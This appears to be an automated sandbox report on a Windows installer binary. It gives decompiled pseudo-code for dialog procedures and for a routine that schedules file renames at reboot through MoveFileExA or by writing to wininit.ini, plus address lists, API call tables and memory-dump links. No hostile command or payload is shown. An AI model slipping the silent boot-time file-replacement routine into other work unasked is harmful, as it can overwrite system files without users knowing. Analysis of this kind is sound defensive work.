                                                                  						__eflags =  *0x7a274c;
                                                                  						return 0 |  *0x7a274c == 0x00000000;
                                                                  					}
                                                                  				} else {
                                                                  					_t117 = _a4;
                                                                  					if(_t135 == 0x47) {
                                                                  						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
                                                                  					}
                                                                  					if(_t135 == 5) {
                                                                  						asm("sbb eax, eax");
                                                                  						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
                                                                  					}
                                                                  					if(_t135 != 0x40d) {
                                                                  						__eflags = _t135 - 0x11;
                                                                  						if(_t135 != 0x11) {
                                                                  							__eflags = _t135 - 0x10;
                                                                  							if(_t135 != 0x10) {
                                                                  								L14:
                                                                  								__eflags = _t135 - 0x111;
                                                                  								if(_t135 != 0x111) {
                                                                  									L30:
                                                                  									return E00403E0E(_t135, _a12, _a16);
                                                                  								}
                                                                  								_t134 = _a12 & 0x0000ffff;
                                                                  								_t127 = GetDlgItem(_t117, _t134);
                                                                  								__eflags = _t127;
                                                                  								if(_t127 == 0) {
                                                                  									L17:
                                                                  									__eflags = _t134 - 1;
                                                                  									if(_t134 != 1) {
                                                                  										__eflags = _t134 - 3;
                                                                  										if(_t134 != 3) {
                                                                  											__eflags = _t134 - 2;
                                                                  											if(_t134 != 2) {
                                                                  												L29:
                                                                  												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                                                  												goto L30;
                                                                  											}
                                                                  											__eflags =  *0x7a300c;
                                                                  											if( *0x7a300c == 0) {
                                                                  												_t97 = E00401410(3);
                                                                  												__eflags = _t97;
                                                                  												if(_t97 != 0) {
                                                                  													goto L30;
                                                                  												}
                                                                  												 *0x79e950 = 1;
                                                                  												L25:
                                                                  												_push(0x78);
                                                                  												L26:
                                                                  												E00403D80();
                                                                  												goto L30;
                                                                  											}
                                                                  											E00401410(_t134);
                                                                  											 *0x79e950 = _t134;
                                                                  											goto L25;
                                                                  										}
                                                                  										__eflags =  *0x409284;
                                                                  										if( *0x409284 <= 0) {
                                                                  											goto L29;
                                                                  										}
                                                                  										_push(0xffffffff);
                                                                  										goto L26;
                                                                  									}
                                                                  									_push(1);
                                                                  									goto L26;
                                                                  								}
                                                                  								SendMessageA(_t127, 0xf3, 0, 0);
                                                                  								_t101 = IsWindowEnabled(_t127);
                                                                  								__eflags = _t101;
                                                                  								if(_t101 == 0) {
                                                                  									goto L61;
                                                                  								}
                                                                  								goto L17;
                                                                  							}
                                                                  							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                                                  							if(__eflags != 0) {
                                                                  								goto L30;
                                                                  							}
                                                                  							_t104 = IsWindowEnabled( *0x79e548);
                                                                  							__eflags = _t104;
                                                                  							if(_t104 != 0) {
                                                                  								goto L30;
                                                                  							}
                                                                  							_t135 = 0x111;
                                                                  							_a12 = 1;
                                                                  							goto L14;
                                                                  						}
                                                                  						SetWindowLongA(_t117, 0, 0);
                                                                  						return 1;
                                                                  					} else {
                                                                  						DestroyWindow( *0x7a2758);
                                                                  						 *0x7a2758 = _a12;
                                                                  						L58:
                                                                  						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                                                  							ShowWindow(_t117, 0xa);
                                                                  							 *0x7a0580 = 1;
                                                                  						}
                                                                  						L61:
                                                                  						return 0;
                                                                  					}
                                                                  				}
                                                                  			}




























                                                                  0x004038c9
                                                                  0x004038d1
                                                                  0x00403a4a
                                                                  0x00403a4e
                                                                  0x00403a52
                                                                  0x00403a54
                                                                  0x00403a59
                                                                  0x00403a64
                                                                  0x00403a6f
                                                                  0x00403a74
                                                                  0x00403a76
                                                                  0x00403a78
                                                                  0x00403a7b
                                                                  0x00403a80
                                                                  0x00403a8e
                                                                  0x00403a9b
                                                                  0x00403aa2
                                                                  0x00403aa2
                                                                  0x00403aa3
                                                                  0x00403aa3
                                                                  0x00403aa8
                                                                  0x00403ab5
                                                                  0x00403abb
                                                                  0x00403abd
                                                                  0x00403afd
                                                                  0x00403b02
                                                                  0x00403b07
                                                                  0x00403b07
                                                                  0x00403b0c
                                                                  0x00403b15
                                                                  0x00403b17
                                                                  0x00403b1c
                                                                  0x00403b22
                                                                  0x00403b26
                                                                  0x00403b26
                                                                  0x00403b2b
                                                                  0x00403b32
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403b3d
                                                                  0x00403b43
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403b49
                                                                  0x00403b4c
                                                                  0x00403b4f
                                                                  0x00403b54
                                                                  0x00403b59
                                                                  0x00403b5c
                                                                  0x00403b62
                                                                  0x00403b67
                                                                  0x00403b6a
                                                                  0x00403b70
                                                                  0x00403b75
                                                                  0x00403b78
                                                                  0x00403b7e
                                                                  0x00403b86
                                                                  0x00403b8c
                                                                  0x00403b93
                                                                  0x00403b95
                                                                  0x00403b9c
                                                                  0x00403b9c
                                                                  0x00403b9c
                                                                  0x00403ba6
                                                                  0x00403bb5
                                                                  0x00403bc1
                                                                  0x00403bd0
                                                                  0x00403be7
                                                                  0x00403be9
                                                                  0x00403bef
                                                                  0x00403c04
                                                                  0x00403bf1
                                                                  0x00403bfa
                                                                  0x00403bfc
                                                                  0x00403bfc
                                                                  0x00403c0a
                                                                  0x00403c1a
                                                                  0x00403c1f
                                                                  0x00403c2a
                                                                  0x00403c2b
                                                                  0x00403c32
                                                                  0x00403c38
                                                                  0x00403c3c
                                                                  0x00403c41
                                                                  0x00403c43
                                                                  0x00000000
                                                                  0x00403c49
                                                                  0x00403c49
                                                                  0x00403c4b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403c51
                                                                  0x00403c55
                                                                  0x00403c7a
                                                                  0x00403c80
                                                                  0x00403c86
                                                                  0x00403c89
                                                                  0x00403caf
                                                                  0x00403cb5
                                                                  0x00403cb7
                                                                  0x00403cbc
                                                                  0x00403cc2
                                                                  0x00403cc5
                                                                  0x00403cc8
                                                                  0x00403cdf
                                                                  0x00403ceb
                                                                  0x00403d06
                                                                  0x00403d0c
                                                                  0x00403d10
                                                                  0x00403d1d
                                                                  0x00403d28
                                                                  0x00403d28
                                                                  0x00403cbc
                                                                  0x00000000
                                                                  0x00403c89
                                                                  0x00403c57
                                                                  0x00403c5d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403c63
                                                                  0x00403c69
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403c6f
                                                                  0x00403c43
                                                                  0x00403d35
                                                                  0x00403d41
                                                                  0x00403d41
                                                                  0x00403d49
                                                                  0x00000000
                                                                  0x00403abf
                                                                  0x00403abf
                                                                  0x00403ac2
                                                                  0x00403af5
                                                                  0x00403af5
                                                                  0x00403af7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403af7
                                                                  0x00403ac4
                                                                  0x00403ac8
                                                                  0x00403acd
                                                                  0x00403acf
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403adf
                                                                  0x00403ae7
                                                                  0x00000000
                                                                  0x00403aed
                                                                  0x004038e3
                                                                  0x004038e3
                                                                  0x004038ea
                                                                  0x004038fb
                                                                  0x004038fb
                                                                  0x00403904
                                                                  0x0040390d
                                                                  0x00403918
                                                                  0x00403918
                                                                  0x00403924
                                                                  0x00403940
                                                                  0x00403943
                                                                  0x00403958
                                                                  0x0040395b
                                                                  0x00403990
                                                                  0x00403990
                                                                  0x00403996
                                                                  0x00403a37
                                                                  0x00000000
                                                                  0x00403a40
                                                                  0x0040399c
                                                                  0x004039af
                                                                  0x004039b1
                                                                  0x004039b3
                                                                  0x004039d0
                                                                  0x004039d3
                                                                  0x004039d5
                                                                  0x004039da
                                                                  0x004039dd
                                                                  0x004039ec
                                                                  0x004039ef
                                                                  0x00403a22
                                                                  0x00403a35
                                                                  0x00000000
                                                                  0x00403a35
                                                                  0x004039f1
                                                                  0x004039f8
                                                                  0x00403a11
                                                                  0x00403a16
                                                                  0x00403a18
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403a1a
                                                                  0x00403a06
                                                                  0x00403a06
                                                                  0x00403a08
                                                                  0x00403a08
                                                                  0x00000000
                                                                  0x00403a08
                                                                  0x004039fb
                                                                  0x00403a00
                                                                  0x00000000
                                                                  0x00403a00
                                                                  0x004039df
                                                                  0x004039e6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004039e8
                                                                  0x00000000
                                                                  0x004039e8
                                                                  0x004039d7
                                                                  0x00000000
                                                                  0x004039d7
                                                                  0x004039bf
                                                                  0x004039c2
                                                                  0x004039c8
                                                                  0x004039ca
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004039ca
                                                                  0x00403963
                                                                  0x00403969
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403975
                                                                  0x0040397b
                                                                  0x0040397d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403983
                                                                  0x00403988
                                                                  0x00000000
                                                                  0x00403988
                                                                  0x0040394a
                                                                  0x00000000
                                                                  0x00403926
                                                                  0x0040392c
                                                                  0x00403936
                                                                  0x00403d4f
                                                                  0x00403d56
                                                                  0x00403d64
                                                                  0x00403d6a
                                                                  0x00403d6a
                                                                  0x00403d74
                                                                  0x00000000
                                                                  0x00403d74
                                                                  0x00403924

                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                  • ShowWindow.USER32(?), ref: 00403918
                                                                  • DestroyWindow.USER32 ref: 0040392C
                                                                  • SetWindowLongA.USER32 ref: 0040394A
                                                                  • IsWindowEnabled.USER32 ref: 00403975
                                                                  • GetDlgItem.USER32 ref: 004039A3
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                  • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                  • GetDlgItem.USER32 ref: 00403A6A
                                                                  • GetDlgItem.USER32 ref: 00403A74
                                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                  • GetDlgItem.USER32 ref: 00403B86
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                  • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                  • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                  • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                  • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                  • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3950083612-0
                                                                  • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                  • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                  • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                  • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 92%
                                                                  			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                  				char* _v8;
                                                                  				signed int _v12;
                                                                  				void* _v16;
                                                                  				struct HWND__* _t52;
                                                                  				long _t86;
                                                                  				int _t98;
                                                                  				struct HWND__* _t99;
                                                                  				signed int _t100;
                                                                  				intOrPtr _t109;
                                                                  				int _t110;
                                                                  				signed int* _t112;
                                                                  				signed int _t113;
                                                                  				char* _t114;
                                                                  				CHAR* _t115;
                                                                  
                                                                  				if(_a8 != 0x110) {
                                                                  					if(_a8 != 0x111) {
                                                                  						L11:
                                                                  						if(_a8 != 0x4e) {
                                                                  							if(_a8 == 0x40b) {
                                                                  								 *0x79f568 =  *0x79f568 + 1;
                                                                  							}
                                                                  							L25:
                                                                  							_t110 = _a16;
                                                                  							L26:
                                                                  							return E00403E0E(_a8, _a12, _t110);
                                                                  						}
                                                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                  						_t110 = _a16;
                                                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                  							_v12 = _t100;
                                                                  							_v16 = _t109;
                                                                  							_v8 = 0x7a1f20;
                                                                  							if(_t100 - _t109 < 0x800) {
                                                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                  								SetCursor(LoadCursorA(0, 0x7f02));
                                                                  								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                  								SetCursor(LoadCursorA(0, 0x7f00));
                                                                  								_t110 = _a16;
                                                                  							}
                                                                  						}
                                                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                  							goto L26;
                                                                  						} else {
                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                  								SendMessageA( *0x7a2f84, 0x111, 1, 0);
                                                                  							}
                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                  								SendMessageA( *0x7a2f84, 0x10, 0, 0);
                                                                  							}
                                                                  							return 1;
                                                                  						}
                                                                  					}
                                                                  					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
                                                                  						goto L25;
                                                                  					} else {
                                                                  						_t112 =  *0x79ed58 + 0x14;
                                                                  						if(( *_t112 & 0x00000020) == 0) {
                                                                  							goto L25;
                                                                  						}
                                                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                  						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                  						E0040417A();
                                                                  						goto L11;
                                                                  					}
                                                                  				}
                                                                  				_t98 = _a16;
                                                                  				_t113 =  *(_t98 + 0x30);
                                                                  				if(_t113 < 0) {
                                                                  					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
                                                                  				}
                                                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                  				_t114 = _t113 +  *0x7a2fb8;
                                                                  				_push(0x22);
                                                                  				_a16 =  *_t114;
                                                                  				_v12 = _v12 & 0x00000000;
                                                                  				_t115 = _t114 + 1;
                                                                  				_v16 = _t115;
                                                                  				_v8 = E00403EBB;
                                                                  				E00403DA7(_a4);
                                                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                  				_push(0x23);
                                                                  				E00403DA7(_a4);
                                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                  				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                  				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                  				E00403DDC(_t99);
                                                                  				SendMessageA(_t99, 0x45b, 1, 0);
                                                                  				_t86 =  *( *0x7a2f88 + 0x68);
                                                                  				if(_t86 < 0) {
                                                                  					_t86 = GetSysColor( ~_t86);
                                                                  				}
                                                                  				SendMessageA(_t99, 0x443, 0, _t86);
                                                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                  				 *0x79e54c =  *0x79e54c & 0x00000000;
                                                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                  				 *0x79f568 =  *0x79f568 & 0x00000000;
                                                                  				return 0;
                                                                  			}

















                                                                  0x00403eff
                                                                  0x00404025
                                                                  0x00404081
                                                                  0x00404085
                                                                  0x0040415c
                                                                  0x0040415e
                                                                  0x0040415e
                                                                  0x00404164
                                                                  0x00404164
                                                                  0x00404167
                                                                  0x00000000
                                                                  0x0040416e
                                                                  0x00404093
                                                                  0x00404095
                                                                  0x0040409f
                                                                  0x004040aa
                                                                  0x004040ad
                                                                  0x004040b0
                                                                  0x004040bb
                                                                  0x004040be
                                                                  0x004040c5
                                                                  0x004040d3
                                                                  0x004040eb
                                                                  0x004040fe
                                                                  0x0040410e
                                                                  0x00404110
                                                                  0x00404110
                                                                  0x004040c5
                                                                  0x0040411a
                                                                  0x00000000
                                                                  0x00404125
                                                                  0x00404129
                                                                  0x0040413a
                                                                  0x0040413a
                                                                  0x00404140
                                                                  0x0040414e
                                                                  0x0040414e
                                                                  0x00000000
                                                                  0x00404152
                                                                  0x0040411a
                                                                  0x00404030
                                                                  0x00000000
                                                                  0x00404044
                                                                  0x0040404a
                                                                  0x00404050
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404075
                                                                  0x00404077
                                                                  0x0040407c
                                                                  0x00000000
                                                                  0x0040407c
                                                                  0x00404030
                                                                  0x00403f05
                                                                  0x00403f08
                                                                  0x00403f0d
                                                                  0x00403f1e
                                                                  0x00403f1e
                                                                  0x00403f25
                                                                  0x00403f28
                                                                  0x00403f2a
                                                                  0x00403f2f
                                                                  0x00403f38
                                                                  0x00403f3e
                                                                  0x00403f4a
                                                                  0x00403f4d
                                                                  0x00403f56
                                                                  0x00403f5b
                                                                  0x00403f5e
                                                                  0x00403f63
                                                                  0x00403f7a
                                                                  0x00403f81
                                                                  0x00403f94
                                                                  0x00403f97
                                                                  0x00403fac
                                                                  0x00403fb3
                                                                  0x00403fb8
                                                                  0x00403fbd
                                                                  0x00403fbd
                                                                  0x00403fcc
                                                                  0x00403fdb
                                                                  0x00403fdd
                                                                  0x00403ff3
                                                                  0x00404002
                                                                  0x00404004
                                                                  0x00000000

                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                                                  • GetDlgItem.USER32 ref: 00403F8E
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                  • GetSysColor.USER32(?), ref: 00403FBD
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                  • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                  • GetDlgItem.USER32 ref: 00404065
                                                                  • SendMessageA.USER32(00000000), ref: 00404068
                                                                  • GetDlgItem.USER32 ref: 00404093
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                  • LoadCursorA.USER32 ref: 004040E2
                                                                  • SetCursor.USER32(00000000), ref: 004040EB
                                                                  • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                  • LoadCursorA.USER32 ref: 0040410B
                                                                  • SetCursor.USER32(00000000), ref: 0040410E
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: N$open
                                                                  • API String ID: 3615053054-904208323
                                                                  • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                  • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                  • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                  • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 94%
                                                                  			E00405707(long _a4, long _a16) {
                                                                  				CHAR* _v0;
                                                                  				intOrPtr* _t13;
                                                                  				long _t14;
                                                                  				int _t19;
                                                                  				void* _t27;
                                                                  				long _t28;
                                                                  				intOrPtr* _t36;
                                                                  				int _t42;
                                                                  				intOrPtr* _t43;
                                                                  				long _t48;
                                                                  				CHAR* _t50;
                                                                  				void* _t52;
                                                                  				void* _t54;
                                                                  
                                                                  				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
                                                                  				_t50 = _v0;
                                                                  				if(_t13 != 0) {
                                                                  					_t19 =  *_t13(_a4, _t50, 5);
                                                                  					if(_t19 != 0) {
                                                                  						L16:
                                                                  						 *0x7a3010 =  *0x7a3010 + 1;
                                                                  						return _t19;
                                                                  					}
                                                                  				}
                                                                  				 *0x7a1710 = 0x4c554e;
                                                                  				if(_t50 == 0) {
                                                                  					L5:
                                                                  					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
                                                                  					if(_t14 != 0 && _t14 <= 0x400) {
                                                                  						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
                                                                  						GetWindowsDirectoryA(0x7a1188, 0x3f0);
                                                                  						lstrcatA(0x7a1188, "\\wininit.ini");
                                                                  						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
                                                                  						_t54 = _t19;
                                                                  						if(_t54 == 0xffffffff) {
                                                                  							goto L16;
                                                                  						}
                                                                  						_t48 = GetFileSize(_t54, 0);
                                                                  						_t5 = _t42 + 0xa; // 0xa
                                                                  						_t52 = GlobalAlloc(0x40, _t48 + _t5);
                                                                  						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
                                                                  							L15:
                                                                  							_t19 = CloseHandle(_t54);
                                                                  							goto L16;
                                                                  						} else {
                                                                  							if(E00405624(_t52, "[Rename]\r\n") != 0) {
                                                                  								_t27 = E00405624(_t25 + 0xa, "\n[");
                                                                  								if(_t27 == 0) {
                                                                  									L13:
                                                                  									_t28 = _t48;
                                                                  									L14:
                                                                  									E00405670(_t52 + _t28, 0x7a0d88, _t42);
                                                                  									SetFilePointer(_t54, 0, 0, 0);
                                                                  									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
                                                                  									GlobalFree(_t52);
                                                                  									goto L15;
                                                                  								}
                                                                  								_t36 = _t27 + 1;
                                                                  								_t43 = _t36;
                                                                  								if(_t36 >= _t52 + _t48) {
                                                                  									L21:
                                                                  									_t28 = _t36 - _t52;
                                                                  									goto L14;
                                                                  								} else {
                                                                  									goto L20;
                                                                  								}
                                                                  								do {
                                                                  									L20:
                                                                  									 *((char*)(_t43 + _t42)) =  *_t43;
                                                                  									_t43 = _t43 + 1;
                                                                  								} while (_t43 < _t52 + _t48);
                                                                  								goto L21;
                                                                  							}
                                                                  							E004059BF(_t52 + _t48, "[Rename]\r\n");
                                                                  							_t48 = _t48 + 0xa;
                                                                  							goto L13;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					CloseHandle(E00405690(_t50, 0, 1));
                                                                  					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
                                                                  					if(_t14 != 0 && _t14 <= 0x400) {
                                                                  						goto L5;
                                                                  					}
                                                                  				}
                                                                  				return _t14;
                                                                  			}
















                                                                  0x00405715
                                                                  0x0040571c
                                                                  0x00405720
                                                                  0x00405729
                                                                  0x0040572d
                                                                  0x00405879
                                                                  0x00405879
                                                                  0x00000000
                                                                  0x00405879
                                                                  0x0040572d
                                                                  0x00405739
                                                                  0x0040574f
                                                                  0x00405777
                                                                  0x00405782
                                                                  0x00405786
                                                                  0x004057a9
                                                                  0x004057b1
                                                                  0x004057bd
                                                                  0x004057d4
                                                                  0x004057da
                                                                  0x004057df
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004057ee
                                                                  0x004057f0
                                                                  0x004057fd
                                                                  0x00405801
                                                                  0x00405872
                                                                  0x00405873
                                                                  0x00000000
                                                                  0x0040581d
                                                                  0x0040582a
                                                                  0x0040588f
                                                                  0x00405896
                                                                  0x0040583d
                                                                  0x0040583d
                                                                  0x0040583f
                                                                  0x00405848
                                                                  0x00405853
                                                                  0x00405865
                                                                  0x0040586c
                                                                  0x00000000
                                                                  0x0040586c
                                                                  0x00405898
                                                                  0x0040589e
                                                                  0x004058a0
                                                                  0x004058af
                                                                  0x004058af
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004058a2
                                                                  0x004058a2
                                                                  0x004058a4
                                                                  0x004058a7
                                                                  0x004058ab
                                                                  0x00000000
                                                                  0x004058a2
                                                                  0x00405835
                                                                  0x0040583a
                                                                  0x00000000
                                                                  0x0040583a
                                                                  0x00405801
                                                                  0x00405751
                                                                  0x0040575c
                                                                  0x00405765
                                                                  0x00405769
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405769
                                                                  0x00405883

                                                                  APIs
                                                                    • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                    • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                    • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                  • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                  • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                  • wsprintfA.USER32 ref: 004057A0
                                                                  • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                  • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                  • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                  • GlobalFree.KERNEL32 ref: 0040586C
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                    • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
